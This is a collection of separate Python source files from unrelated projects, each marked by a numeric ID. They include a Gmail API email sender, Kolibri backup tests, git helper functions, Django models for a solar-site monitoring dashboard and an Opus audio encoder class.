column was not found in log. Skipped.') columns_order.pop(c) for key, value in sorted(columns_order.items(), key=lambda x: x[1]): idx = value if idx < 0: idx = n_cols + idx + 1 cols_order.insert(idx, key) else: warnings.warn('Wrong type of columns_order variable. List or dict is expected. ' + 'Got ' + str(type(columns_order)) + '.') # Save results to CSV file log_df[cols_order].sort_values(sort_log_by, ascending=sort_log_ascending).\ to_csv(log_fname, index=False) if update_html_flag: update_html() def update_html(): ''' Function to generate update report in html. ''' pass
11589211
from bitmovin_api_sdk.encoding.configurations.video.mjpeg.customdata.customdata_api import CustomdataApi
11589272
from __future__ import print_function import base64 import mimetypes import os from email.mime.audio import MIMEAudio from email.mime.base import MIMEBase from email.mime.image import MIMEImage from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText import httplib2 import oauth2client from apiclient import errors, discovery from oauth2client import client, tools SCOPES = 'https://www.googleapis.com/auth/gmail.send' CLIENT_SECRET_FILE = 'client_secret.json' APPLICATION_NAME = 'Gmail API Python Send Email' def get_credentials(): home_dir = os.path.expanduser('~') credential_dir = os.path.join(home_dir, '.credentials') if not os.path.exists(credential_dir): os.makedirs(credential_dir) credential_path = os.path.join(credential_dir, 'gmail-python-email-send.json') store = oauth2client.file.Storage(credential_path) credentials = store.get() if not credentials or credentials.invalid: flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES) flow.user_agent = APPLICATION_NAME credentials = tools.run_flow(flow, store) print('Storing credentials to ' + credential_path) return credentials def SendMessage(sender, to, subject, msgHtml, msgPlain, attachmentFile=None): credentials = get_credentials() http = credentials.authorize(httplib2.Http()) service = discovery.build('gmail', 'v1', http=http) if attachmentFile: message1 = createMessageWithAttachment(sender, to, subject, msgHtml, msgPlain, attachmentFile) else: message1 = CreateMessageHtml(sender, to, subject, msgHtml, msgPlain) result = SendMessageInternal(service, "me", message1) return result def SendMessageInternal(service, user_id, message): try: message = (service.users().messages().send(userId=user_id, body=message).execute()) print('Message Id: %s' % message['id']) return message except errors.HttpError as error: print('An error occurred: %s' % error) return "Error" return "OK" def createMessageWithAttachment( sender, to, subject, msgHtml, msgPlain, attachmentFile): """Create a message for an email. Args: sender: Email address of the sender. to: Email address of the receiver. subject: The subject of the email message. msgHtml: Html message to be sent msgPlain: Alternative plain text message for older email clients attachmentFile: The path to the file to be attached. Returns: An object containing a base64url encoded email object. """ message = MIMEMultipart('mixed') message['to'] = to message['from'] = sender message['subject'] = subject messageA = MIMEMultipart('alternative') messageR = MIMEMultipart('related') messageR.attach(MIMEText(msgHtml, 'html')) messageA.attach(MIMEText(msgPlain, 'plain')) messageA.attach(messageR) message.attach(messageA) print("create_message_with_attachment: file:", attachmentFile) content_type, encoding = mimetypes.guess_type(attachmentFile) if content_type is None or encoding is not None: content_type = 'application/octet-stream' main_type, sub_type = content_type.split('/', 1) if main_type == 'text': fp = open(attachmentFile, 'rb') msg = MIMEText(fp.read(), _subtype=sub_type) fp.close() elif main_type == 'image': fp = open(attachmentFile, 'rb') msg = MIMEImage(fp.read(), _subtype=sub_type) fp.close() elif main_type == 'audio': fp = open(attachmentFile, 'rb') msg = MIMEAudio(fp.read(), _subtype=sub_type) fp.close() else: fp = open(attachmentFile, 'rb') msg = MIMEBase(main_type, sub_type) msg.set_payload(fp.read()) fp.close() filename = os.path.basename(attachmentFile) msg.add_header('Content-Disposition', 'attachment', filename=filename) message.attach(msg) return {'raw': base64.urlsafe_b64encode(message.as_string())} def CreateMessageHtml(sender, to, subject, msgHtml, msgPlain): msg = MIMEMultipart('alternative') msg['Subject'] = subject msg['From'] = sender msg['To'] = to msg.attach(MIMEText(msgPlain, 'plain')) msg.attach(MIMEText(msgHtml, 'html')) return {'raw': base64.urlsafe_b64encode(msg.as_string())} def main(): to = input("Enter Email Address: ") sender = input("Your Mail ID: ") subject = input("Enter your Subject: ") msgHtml = input("Enter your Message: ") msgPlain = "Hi\nPlain Email" SendMessage(sender, to, subject, msgHtml, msgPlain) # Send message with attachment: # SendMessage(sender, to, subject, msgHtml, msgPlain, '/path/to/file.pdf') if __name__ == '__main__': main()
11589273
from os import cpu_count from multiprocessing.dummy import Pool def test(i): print(f"线程{i}开始死循环~") while True: pass def main(): pool = Pool(5) pool.map_async(test, range(5)) pool.close() pool.join() if __name__ == '__main__': main()
11589277
from __future__ import absolute_import from __future__ import print_function from __future__ import unicode_literals import os import tempfile import pytest from django.core.management import call_command from mock import patch from kolibri.core.deviceadmin.tests.test_dbrestore import is_sqlite_settings from kolibri.core.deviceadmin.tests.test_dbrestore import mock_status_not_running from kolibri.core.deviceadmin.utils import dbbackup from kolibri.core.deviceadmin.utils import IncompatibleDatabase def test_active_kolibri(): """ Tests that we cannot restore while kolibri is active """ with patch( "kolibri.utils.server.get_status", return_value=(12345, "http://127.0.0.1", 1234), ) as gs: with pytest.raises(SystemExit): call_command("dbbackup") gs.assert_called_once() def test_inactive_kolibri(): """ Tests that if kolibri is inactive, a dump is created """ if not is_sqlite_settings(): return dest_folder = tempfile.mkdtemp() with patch( "kolibri.utils.server.get_status", side_effect=mock_status_not_running ) as gs: # Since there's no backups available during a test, this should fail! assert not os.listdir(dest_folder) call_command("dbbackup", dest_folder=dest_folder) gs.assert_called_once() files = os.listdir(dest_folder) assert len(files) == 1 assert os.path.getsize(os.path.join(dest_folder, files[0])) > 1000 def test_not_sqlite(): if is_sqlite_settings(): return with pytest.raises(IncompatibleDatabase): dbbackup("/doesnt/matter.file")
11589298
import os from subprocess import Popen class GitError(Exception): pass def clone(repo_url, wd): # pylint: disable=consider-using-with DEVNULL = open(os.devnull, 'w') proc = Popen(['git', 'clone', repo_url, wd], stdout=DEVNULL, stderr=DEVNULL) proc.communicate() if proc.returncode != 0: raise GitError('git clone failed: {}'.format(repo_url)) def checkout(commit, wd): # pylint: disable=consider-using-with DEVNULL = open(os.devnull, 'w') proc = Popen(['git', 'checkout', commit], cwd=wd, stdout=DEVNULL, stderr=DEVNULL) proc.communicate() if proc.returncode != 0: raise GitError('git checkout failed: {}'.format(commit))
11589318
from .Sample import * from .Source import * from .ArtIllumina import * from .MasonIllumina import * from .CuReSim import * from .DwgSim import * from .WgSim import * import os __INCLUDE__ = os.path.join(os.path.dirname(__file__), "mishmash.snake") def include(): return __INCLUDE__ __INPUT__ = [] def add_input(input): __INPUT__.append(input) def input(): return __INPUT__ __SAMPLES__ = [] def add_sample(sample): __SAMPLES__.append(sample) def samples(): return __SAMPLES__ def current_sample(): return __SAMPLES__[-1] __SOURCES__ = [] def add_source(sample): if len(samples()) == 0: rnftools.utils.error( "No sample defined", program="RNFtools", subprogram="MIShmash", exception=ValueError, ) __SOURCES__.append(sample) def sources(): return __SOURCES__ def sample(name, reads_in_tuple): """ Create a new sample. """ if name in [sample_x.get_name() for sample_x in __SAMPLES__]: rnftools.utils.error( "Multiple samples have the same name. Each sample must have a unique name.", program="RNFtools", subprogram="MIShmash", exception=ValueError, ) Sample( name=name, reads_in_tuple=reads_in_tuple, ) add_input(current_sample().fq_fns())
11589403
from django.contrib.auth.models import User, Group from django.db import models from datetime import timedelta from django.conf import settings from django.db.models.signals import post_save from django.dispatch import receiver from rest_framework.authtoken.models import Token from django.contrib import admin from django.contrib.auth.models import AbstractUser from geoposition.fields import GeopositionField from django.utils import timezone from django.core.exceptions import ValidationError from django_mysql.models import JSONField # Create your models here. class VRM_Account(models.Model): """ seperating VRM account for simplicity """ vrm_user_id = models.CharField(max_length=100,default="",primary_key=True) vrm_password = models.CharField(max_length=100,default="") number_of_sites = models.IntegerField(default=0) def __str__(self): return self.vrm_user_id class Meta: verbose_name = 'VRM Account' verbose_name_plural = 'VRM Accounts' permissions = ( ('view_VRM_Accounts', 'View VRM Acccount'), ) class Sesh_Organisation(models.Model): name = models.CharField(max_length=40) send_slack = models.BooleanField(default=False) slack_token = models.CharField(max_length=100, blank=True, null=True) def __str__(self): return self.name def get_users(self): return Sesh_User.objects.filter(organisation=self) class Sesh_User(AbstractUser): """ In creating Sesh_User instances, Always remember to user create_user instead of create, Sesh_User.objects.create_user """ department = models.CharField(max_length=100) organisation = models.ForeignKey(Sesh_Organisation, null=True) is_org_admin = models.BooleanField(default=False) phone_number = models.CharField(max_length=12, blank=True, null=True) on_call = models.BooleanField(default=False) send_mail = models.BooleanField(default=False) send_sms = models.BooleanField(default=False) def __str__(self): return self.username class Meta: verbose_name = 'User' verbose_name_plural = 'Users' class Slack_Channel(models.Model): organisation = models.ForeignKey(Sesh_Organisation, related_name='slack_channel') name = models.CharField(max_length=40) is_alert_channel = models.BooleanField(default=True) def __str__(self): return self.name class Status_Card(models.Model): """ Contains the rows to be displayed in the status card """ row1 = models.CharField(max_length=30, null=True, blank=True) row2 = models.CharField(max_length=30, null=True, blank=True) row3 = models.CharField(max_length=30, null=True, blank=True) row4 = models.CharField(max_length=30, null=True, blank=True) def __str__(self): return "For site: " + self.sesh_site.site_name def get_choices(self): """ Returns the choices for the status card """ from seshdash.utils.model_tools import get_site_sensor_fields_choices return get_site_sensor_fields_choices(self.sesh_site) class Site_Measurements(models.Model): """ Contains measurements to be displayed in graphs dropdowns """ ROW_CHOICES = ( ('AC_Load_in', 'AC Load in'), ('AC_Load_out', 'AC Load out'), ('AC_Voltage_in', 'AC Voltage in'), ('AC_Voltage_out', 'AC Voltage out'), ('AC_input', 'AC input'), ('AC_output', 'AC output' ), ('AC_output_absolute', 'AC output absolute'), ('battery_voltage', 'Battery Voltage'), ('genset_state', 'Genset state'), ('main_on', 'Main on'), ('pv_production', 'PV production'), ('relay_state', 'Relay state'), ('soc', 'State of Charge'), ('trans', 'Trans'), ('cloud_cover', 'Cloud Cover'), ("daily_battery_charge","Daily Battery Charge"), ("daily_grid_outage_n", "Daily Grid Outage N"), ("daily_grid_outage_t", "Daily Grid Outage T"), ("daily_grid_usage", "Daily Grid Usage"), ("daily_no_of_alerts", "Daily Number of Alerts"), ("daily_power_cons_pv", "Daily Power Cons Pv"), ("daily_power_consumption_total", "Daily Power Consumption Total"), ("daily_pv_yield", "Daily Pv Yield"), ) row1 = models.CharField(max_length=30, choices=ROW_CHOICES, default='soc') row2 = models.CharField(max_length=30, choices=ROW_CHOICES, default='battery_voltage') row3 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_output_absolute') row4 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_Load_in') row5 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_Load_out') row6 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_Voltage_in') row7 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_Voltage_out') row8 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_input') row9 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_output') row10 = models.CharField(max_length=30, choices=ROW_CHOICES, default='cloud_cover') row11 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_pv_yield') row12 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_battery_charge') row13 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_power_consumption_total') row14 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_power_cons_pv') row15 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_grid_outage_n') def __str__(self): return self.sesh_site.site_name class Sesh_Site(models.Model): """ Model for each PV SESH installed site """ site_name = models.CharField(max_length=100, unique = True) organisation = models.ForeignKey(Sesh_Organisation, null=True, blank=True) comission_date = models.DateTimeField('date comissioned') location_city = models.CharField(max_length = 100) location_country = models.CharField(max_length = 100) time_zone = models.CharField(max_length = 100, default='Africa/Kigali') position = GeopositionField() installed_kw = models.FloatField(default=None, blank=True) system_voltage = models.IntegerField(default=None, blank=True) number_of_panels = models.IntegerField(default=None, blank=True) #enphase_ID = models.CharField( max_length = 100) #TODO need to figure a way to show this in admin to automatically populate #enphase_site_id = models.IntegerField() import_data = models.BooleanField(default=False) battery_bank_capacity = models.IntegerField() has_genset = models.BooleanField(default=False) has_grid = models.BooleanField(default=False) has_pv = models.BooleanField(default=False) has_batteries =models.BooleanField(default=False) vrm_account = models.ForeignKey(VRM_Account,default=None,blank=True,null=True) vrm_site_id = models.CharField(max_length=20,default="",blank=True, null=True) status_card = models.OneToOneField(Status_Card,default=None,blank=True,null=True, on_delete=models.SET_NULL) site_measurements = models.OneToOneField(Site_Measurements, default=None,blank=True,null=True, on_delete=models.SET_NULL) def __str__(self): return self.site_name def save(self, *args, **kwargs): # If site is being created if self.pk is None: self.status_card = Status_Card.objects.create() self.site_measurements = Site_Measurements.objects.create() super(Sesh_Site, self).save(*args, **kwargs) Sensor_Node.objects.create(site=self) else: super(Sesh_Site, self).save(*args, **kwargs) def delete(self, *args, **kwargs): # Delete the site and its associated status card status_card = self.status_card site_measurements = self.site_measurements site_measurements.delete() status_card.delete() super(Sesh_Site, self).delete(*args, **kwargs) #Row based permissioning using django guardian not every user should be able to see all sites class Meta: verbose_name = 'Sesh Site' verbose_name_plural = 'Sesh Sites' permissions = ( ('view_Sesh_Site', 'View Sesh Site'), ) class Sesh_RMC_Account(models.Model): """ API key used by SESH EMON node to communicate """ site = models.OneToOneField(Sesh_Site, on_delete = models.CASCADE, primary_key = True) api_key = models.CharField(max_length=130,default="", unique=True) api_key_numeric = models.CharField(max_length=130, default="", unique=True) def __str__(self): return "alphanum:%s numeric:%s "%(self.api_key,self.api_key_numeric) def save(self, **kwargs): """ Generate numeric version of api key """ numeric_key = "" for l in self.api_key: numeric_key = numeric_key + str(ord(l)); self.api_key_numeric = numeric_key[:len(self.api_key)] super(Sesh_RMC_Account,self).save(**kwargs) class Meta: verbose_name = "RMC API Account" class Alert_Rule(models.Model): """ Basic Alert rule model Alerts are defined through field choices. if an alert is defined as <model-name>#<field> this will be checking the MYSQL db if an alert is simple <field-name> it will be queried in influx """ OPERATOR_CHOICES = ( ("eq" , "equals"), ("lt" , "less than"), ("gt" , "greater than"), ) OPERATOR_MAPPING = { 'eq' : '=', 'lt' : '<', 'gt' : '>', } site = models.ForeignKey(Sesh_Site) check_field = models.CharField(max_length=100) value = models.FloatField() operator = models.CharField(max_length=2, choices=OPERATOR_CHOICES, default="lt") #TODO a slug field with the field operator and value info can be added #TODO this is vastly incomplete!! fields need to be mapable and chooices need to exist def __str__(self): return "If %s is %s %s" % (self.check_field, self.get_operator_display() ,self.value) class Meta: verbose_name = 'System Alert Rule' verbose_name_plural = 'System Alert Rules' #TODO Add alert Object to save alerts class Sesh_Alert(models.Model): site = models.ForeignKey(Sesh_Site) alert = models.ForeignKey(Alert_Rule, related_name="alert_point") date = models.DateTimeField() isSilence = models.BooleanField() emailSent = models.BooleanField() smsSent = models.BooleanField() slackSent = models.BooleanField() point_model = models.CharField(max_length=40, default="BoM_Data_Point") point_id = models.CharField(max_length=40) # def __str__(self): # # return "Some texting text " # % (self.alert.check_field, self.alert.operator, self.alert.value ) def __str__(self): # TODO make this print useful information return str(self.alert) class Meta: verbose_name = 'System Alert' verbose_name_plural = 'System Alerts' class RMC_status(models.Model): """ Table containing status information for each RMC unit """ # Removing due to infinitae migration error #rmc_account = models.OneToOneField(Sesh_RMC_Account,on_delete=models.CASCADE, related_name="rmc_status") site = models.ForeignKey(Sesh_Site, blank=True, null=True) ip_address = models.GenericIPAddressField(default=None, null=True) minutes_last_contact = models.IntegerField(default=None) signal_strength = models.IntegerField(default=None, null=True) data_sent_24h = models.IntegerField(default=None, null=True) time = models.DateTimeField() target_alert = models.ForeignKey(Sesh_Alert, blank=True, null=True ) def clean(self): if not self.site: raise ValidationError("RMC status object requires either rmc account or sesh site reference") class Meta: verbose_name = 'RMC Status' verbose_name_plural = 'RMC Status\'s' class BoM_Data_Point(models.Model): """ BoM data Soc,, battery voltage system voltage etc Currently comes from Victron """ #TODO unique together contraing on time and site site = models.ForeignKey(Sesh_Site) time = models.DateTimeField() soc = models.FloatField(default=0) battery_voltage = models.FloatField(default=0) battery_current = models.FloatField(default=0) AC_Voltage_in = models.FloatField(default=0) AC_Voltage_out = models.FloatField(default=0) AC_input = models.FloatField(default=0) AC_output = models.FloatField(default=0) AC_output_absolute = models.FloatField(default=0) AC_Load_in = models.FloatField(default=0) AC_Load_out = models.FloatField(default=0) #NEW victron now tells us pv production pv_production = models.FloatField(default=0) inverter_state = models.CharField(max_length = 100, blank=True, null=True) target_alert = models.ForeignKey(Sesh_Alert, blank=True, null=True ) main_on = models.BooleanField(default=False) genset_state = models.IntegerField(default=0) #TODO relay will likely need to be it's own model relay_state = models.IntegerField(default=0) trans = models.IntegerField(default=0) def __str__(self): return " %s : %s : %s" %(self.time,self.site,self.soc) class Meta: verbose_name = 'Data Point' unique_together = ('site','time') class Data_Point(models.Model): """ Successor to Daily Data Point Moving to single field to have a variable number of fields """ UNITS_DICTIONARY = ( ("id", ''), ("soc","%"), ('temperature','C'), ('humidity','%'), ('PH', 'ph'), ('Ethanol', '%'), ("battery_voltage", "V"), ("AC_Voltage_in" , "V"), ("AC_Voltage_out" , "V"), ("AC_input" , "W"), ( "AC_output" , "W"), ( "AC_Load_in" , "A"), ( "AC_Load_out" , "A"), ( "cloud_cover","%"), ( "pv_production" , "W"), ( "main_on" , ""), ( "relay_state", ""), ( "trans" , ""), ( "genset_state" , ""), ( "site" , ""), ( "AC_output_absolute" , "W"), ( "minutes_last_contact" , "min"), ( "daily_battery_charge", "Wh"), ( "daily_grid_outage_n", "minute"), ( "daily_grid_outage_t", ""), ( "daily_grid_usage", "Wh"), ( "daily_no_of_alerts", "alert"), ( "daily_power_cons_pv", "W"), ( "daily_power_consumption_total", "Wh"), ("daily_pv_yield", "Wh"), ) MEASUREMENTS_VERBOSE_NAMES = ( ("soc","State of Charge"), ("battery_voltage", "Battery Voltage"), ("AC_Voltage_in", "AC Voltage In"), ("AC_Voltage_out", "AC Voltage Out"), ("AC_input", "AC Input"), ("AC_output", "AC Output"), ("AC_Load_in", "AC Load in"), ("AC_Load_out", "AC Load out"), ("pv_production", "PV Production"), ("main_on", "Main On"), ("relay_state", "Relay State"), ("trans", " Trans"), ("genset_state", "Genset State"), ("AC_output_absolute", "AC Output absolute"), ("minutes_last_contact", "Minutes last Contact"), ("daily_battery_charge", "Daily Battery Charge"), ("daily_grid_outage_n", "Daily Grid Outage N"), ("daily_grid_outage_t", "Daily Grid Outage T"), ("daily_grid_usage", "Daily Grid Usage"), ("daily_no_of_alerts", "Daily Number of Alerts"), ("daily_power_cons_pv", "Daily Power Cons Pv"), ("daily_power_consumption_total", "Daily Power Consumption Total"), ("daily_pv_yield", "Daily Pv Yield"), ("cloud_cover", "Cloud Cover"), ) site = models.ForeignKey(Sesh_Site) field_name = models.FloatField(default=0, verbose_name="Data Point Name", choices=MEASUREMENTS_VERBOSE_NAMES) field_unit = models.FloatField(default=0, verbose_name="Data Point Name", choices=UNITS_DICTIONARY) field_scale = models.FloatField(default=1) #TODO Perhaps add scale as well? class Daily_Data_Point(models.Model): """ Daily aggregate of data points """ UNITS_DICTIONARY = { "id": '', "soc":"%", "battery_voltage": "V", "AC_Voltage_in" : "V", "AC_Voltage_out" : "V", "AC_input" : "W", "AC_output" : "W", "AC_Load_in" : "A", "AC_Load_out" : "A", "cloud_cover":"%", "pv_production" : "W", "main_on" : "", "relay_state": "", "trans" : "", "genset_state" : "", "site" : "", "AC_output_absolute" : "W", "minutes_last_contact" : "min", "daily_battery_charge": "Wh", "daily_grid_outage_n": "minute", "daily_grid_outage_t": "", "daily_grid_usage": "Wh", "daily_no_of_alerts": "alert", "daily_power_cons_pv": "W", "daily_power_consumption_total": "Wh", "daily_pv_yield": "Wh", } MEASUREMENTS_VERBOSE_NAMES = { "soc":"State of Charge", "battery_voltage": "Battery Voltage", "AC_Voltage_in": "AC Voltage In", "AC_Voltage_out": "AC Voltage Out", "AC_input": "AC Input", "AC_output": "AC Output", "AC_Load_in": "AC Load in", "AC_Load_out": "AC Load out", "pv_production": "PV Production", "main_on": "Main On", "relay_state": "Relay State", "trans": " Trans", "genset_state": "Genset State", "AC_output_absolute": "AC Output absolute", "minutes_last_contact": "Minutes last Contact", "daily_battery_charge": "Daily Battery Charge", "daily_grid_outage_n": "Daily Grid Outage N", "daily_grid_outage_t": "Daily Grid Outage T", "daily_grid_usage": "Daily Grid Usage", "daily_no_of_alerts": "Daily Number of Alerts", "daily_power_cons_pv": "Daily Power Cons Pv", "daily_power_consumption_total": "Daily Power Consumption Total", "daily_pv_yield": "Daily Pv Yield", "cloud_cover": "Cloud Cover", } DEFAULT_UNIT = "%" site = models.ForeignKey(Sesh_Site) daily_pv_yield = models.FloatField(default=0, verbose_name="Daily PV Yield") # Aggregate pv produced that day Kwh daily_power_consumption_total = models.FloatField(default=0, verbose_name="Daily Power Consumption") daily_power_cons_pv = models.FloatField(default=0, verbose_name="Power consumption pv" ) daily_battery_charge = models.FloatField(default=0, verbose_name="Battery Charge") # Amount of charge put in battery daily_grid_outage_t = models.FloatField(default=0, verbose_name="Grid outage t") # Amount of time the grid was off daily_grid_outage_n = models.FloatField(default=0, verbose_name="Grid outagen n") # Aggregate amount times grid was off daily_grid_usage = models.FloatField(default=0, verbose_name="Grid usage" ) # Aggregate amount of grid used daily_no_of_alerts = models.IntegerField(default=0, verbose_name="Number of alerts") date = models.DateTimeField() class Meta: verbose_name = 'Daily Aggregate Data Point' unique_together = ('site','date') def __str__(self): return " sitename:%s \n pv_yield:%s \n power_used:%s \n daily_batt_charge:%s \n grid power used: %s" % (self.site.site_name, self.daily_pv_yield, self.daily_power_cons_pv, self.daily_battery_charge, self.daily_grid_usage) class Trend_Data_Point(models.Model): """ Succesor to aggregate data points. Each site can have almost an unlimited number of aggregate data points, using Trend_Data _point to succede this """ site = models.ForeignKey(Sesh_Site) aggrge_field_name = models.FloatField(default=0) class Site_Weather_Data(models.Model): """ weather data to overlay with each stite """ site = models.ForeignKey(Sesh_Site) date = models.DateTimeField('date',unique_for_date=True) temp = models.IntegerField() condition = models.CharField(max_length=20) cloud_cover = models.FloatField() sunrise = models.TimeField() sunset = models.TimeField() class Meta: verbose_name = 'Weather Data' unique_together = ('site','date') class Status_Rule(models.Model): """ battery_voltage rules and pv pv_production rules """ battery_rules = { 50 : "red", 70 : "yellow", 100: "green" } weather_rules = { 0.7 : "green", 1 : "yellow" } def __str__(self): return self.battery_rules + self.pv_rules # Used globally? SENSORS_LIST = { 'Tx', 'Th', 'Pe' } class Sensor_Node(models.Model): """ Table representative for the emon tx """ SENSOR_TYPE_CHOICES = ( ('th','Temperature Humidity'), ('tx','Power Voltage'), ('pe','Ph Ethenoal'), ('other','Other Sensor'), ) site = models.ForeignKey(Sesh_Site) node_id = models.IntegerField(default=0) sensor_type = models.CharField(max_length=40, choices=SENSOR_TYPE_CHOICES) index1 = models.CharField(max_length=40) index2 = models.CharField(max_length=40, blank=True, null=True) index3 = models.CharField(max_length=40, blank=True, null=True) index4 = models.CharField(max_length=40, blank=True, null=True) index5 = models.CharField(max_length=40, blank=True, null=True) index6 = models.CharField(max_length=40, blank=True, null=True) index7 = models.CharField(max_length=40, blank=True, null=True) index8 = models.CharField(max_length=40, blank=True, null=True) index9 = models.CharField(max_length=40, blank=True, null=True) index10 = models.CharField(max_length=40, blank=True, null=True) index11 = models.CharField(max_length=40, blank=True, null=True) index12 = models.CharField(max_length=40, blank=True, null=True) index13 = models.CharField(max_length=40,blank=True, null=True) index14 = models.CharField(max_length=40, blank=True, null=True) index15 = models.CharField(max_length=40, blank=True, null=True) index16 = models.CharField(max_length=40, blank=True, null=True) index17 = models.CharField(max_length=40, blank=True, null=True) index18 = models.CharField(max_length=40, blank=True, null=True) index19 = models.CharField(max_length=40, blank=True, null=True) index20 = models.CharField(max_length=40, blank=True, null=True) index21 = models.CharField(max_length=40, blank=True, null=True) index22 = models.CharField(max_length=40, blank=True, null=True) index23 = models.CharField(max_length=40, blank=True, null=True) index24 = models.CharField(max_length=40, blank=True, null=True) index25 = models.CharField(max_length=40, blank=True, null=True) index26 = models.CharField(max_length=40, blank=True, null=True) index27 = models.CharField(max_length=40, blank=True, null=True) index28 = models.CharField(max_length=40, blank=True, null=True) index29 = models.CharField(max_length=40, blank=True, null=True) index30 = models.CharField(max_length=40, blank=True, null=True) index31 = models.CharField(max_length=40, blank=True, null=True) index32 = models.CharField(max_length=40, blank=True, null=True) index33 = models.CharField(max_length=40, blank=True, null=True) index34 = models.CharField(max_length=40, blank=True, null=True) index35 = models.CharField(max_length=40, blank=True, null=True) index36 = models.CharField(max_length=40, blank=True, null=True) index37 = models.CharField(max_length=40,blank=True, null=True) index38 = models.CharField(max_length=40, blank=True, null=True) index39 = models.CharField(max_length=40, blank=True, null=True) index40 = models.CharField(max_length=40, blank=True, null=True) index41 = models.CharField(max_length=40, blank=True, null=True) index42 = models.CharField(max_length=40, blank=True, null=True) def __str__(self): return "Sensor Node " + str(self.sensor_type) + " for " + self.site.site_name + " with id "+ str(self.node_id) def save(self, *args, **kwargs): if not Sensor_Mapping.objects.filter(site_id=self.site.id, node_id=self.node_id,sensor_type=self.sensor_type): Sensor_Mapping.objects.create(site_id=self.site.id, node_id=self.node_id, sensor_type=self.sensor_type) super(Sensor_Node,self).save(*args, **kwargs) def delete(self, *args, **kwargs): Sensor_Mapping.objects.filter(site_id=self.site.id, node_id=self.node_id, sensor_type=self.sensor_type).delete() super(Sensor_Node,self).delete(*args, **kwargs) def get_fields(self): """ Returns the field of the sensor """ all_fields = [self.index1, self.index2, self.index3, self.index4, self.index5, self.index5, \ self.index6, self.index7, self.index8, self.index9, self.index10, self.index11, self.index12, \ self.index13, self.index14, self.index15, self.index16, self.index17, self.index18, self.index19, \ self.index20, self.index21, self.index22, self.index23, self.index24, self.index25, self.index26, \ self.index28, self.index29, self.index30, self.index31, self.index32, self.index33, self.index34, \ self.index35, self.index36, self.index37, self.index38, self.index39, self.index40, self.index41, self.index42 ] fields = [] for field in all_fields: if field: fields.append(field) return list(set(fields)) # removing duplicate values if any class Sensor_Mapping(models.Model): """ To contain informations about the sensor mapping of sensors node_ids and sites This helps in the writing of data to the database by the sesh-api-helper """ site_id = models.IntegerField() node_id = models.IntegerField() sensor_type = models.CharField(max_length=40) def __str__(self): return "Site_id: " + str(self.site_id) + " node_id: " + str(self.node_id) + ": " + str(self.sensor_type) class Meta: unique_together = ('site_id', 'node_id', 'sensor_type') class Report_Job(models.Model): """ Model to contain the reports that should be sent, to users of specific sites """ DURATION_CHOICES = ( ('daily', 'Daily'), ('weekly', 'Weekly'), ('monthly', 'Monthly'), ) site = models.ForeignKey(Sesh_Site) duration = models.CharField(max_length=40, choices=DURATION_CHOICES) day_to_report = models.IntegerField() # This will contain an integer value showing the day the reports will execute, if it is a weekly report and the number is 2 then it would execute on Tuesday attributes = JSONField() def __str__(self): return self.get_duration_display() + " report for " + self.site.site_name def get_duration_choices(self): duration_list = [] for item in self.DURATION_CHOICES: duration_list.append(item[0]) return duration_list class Report_Sent(models.Model): """ Store each report sent for later viewing or resending """ report_job = models.ForeignKey(Report_Job) title = models.CharField(max_length = 60) date = models.DateTimeField() status = models.CharField(max_length = 100) content = models.TextField() sent_to = JSONField() # list of users report was sent to class Data_Process_Rule(models.Model): """ for building aggregate batch proccesing functions """ FUNCTION_CHOICES = ( ("mean" , "average"), ("sum" , "aggregate"), ("min" , "minimum"), ("max" , "maximum"), ("mid" , "median"), ("std" , "standard deviation"), ) TIME_BUCKETS = ( ("5m", "5 minutes"), ("10m", "10 minutes"), ("30m", "30 minutes"), ("1h", "1 hour"), ("2h", "2 hours"), ("5h", "5 hours") ) DURATION = ( ("12h", "12 hours"), ("24h", "24 hours"), ("48h", "48 hours"), ("7d", "7 days"), ("31d", "1 month"), ) site = models.ForeignKey(Sesh_Site) function_type = models.CharField(max_length=40, default="aggregate", choices=FUNCTION_CHOICES ) input_field = models.ForeignKey(Daily_Data_Point) duration = models.CharField(max_length=40, default="24h", choices=DURATION) interval = models.CharField(max_length=10, default="5m", choices=TIME_BUCKETS) output_field = models.ForeignKey(Trend_Data_Point)
11589413
import copy import ctypes from typing import Optional, ByteString, List, Tuple, Callable import warnings from . import opus from .opus_encoder import OpusEncoder from .pyogg_error import PyOggError class OpusBufferedEncoder(OpusEncoder): # TODO: This could be made more efficient. We don't need a # deque. Instead, we need only sufficient PCM storage for one # whole packet. We know the size of the packet thanks to # set_frame_size(). def __init__(self) -> None: super().__init__() self._frame_size_ms: Optional[float] = None self._frame_size_bytes: Optional[int] = None # Buffer contains the bytes required for the next # frame. self._buffer: Optional[ctypes.Array] = None # Location of the next free byte in the buffer self._buffer_index = 0 def set_frame_size(self, frame_size: float) -> None: """ Set the desired frame duration (in milliseconds). Valid options are 2.5, 5, 10, 20, 40, or 60ms. """ # Ensure the frame size is valid. Compare frame size in # units of 0.1ms to avoid floating point comparison if int(frame_size*10) not in [25, 50, 100, 200, 400, 600]: raise PyOggError( "Frame size ({:f}) not one of ".format(frame_size)+ "the acceptable values" ) self._frame_size_ms = frame_size self._calc_frame_size() def set_sampling_frequency(self, samples_per_second: int) -> None: super().set_sampling_frequency(samples_per_second) self._calc_frame_size() def buffered_encode(self, pcm_bytes: memoryview, flush: bool = False, callback: Callable[[memoryview,int,bool],None] = None ) -> List[Tuple[memoryview, int, bool]]: """Gets encoded packets and their number of samples. This method returns a list, where each item in the list is a tuple. The first item in the tuple is an Opus-encoded frame stored as a bytes-object. The second item in the tuple is the number of samples encoded (excluding silence). If `callback` is supplied then this method will instead return an empty list but call the callback for every Opus-encoded frame that would have been returned as a list. This option has the desireable property of eliminating the copying of the encoded packets, which is required in order to form a list. The callback should take two arguments, the encoded frame (a Python bytes object) and the number of samples encoded per channel (an int). The user must either process or copy the data as the data may be overwritten once the callback terminates. """ # If there's no work to do return immediately if len(pcm_bytes) == 0 and flush == False: return [] 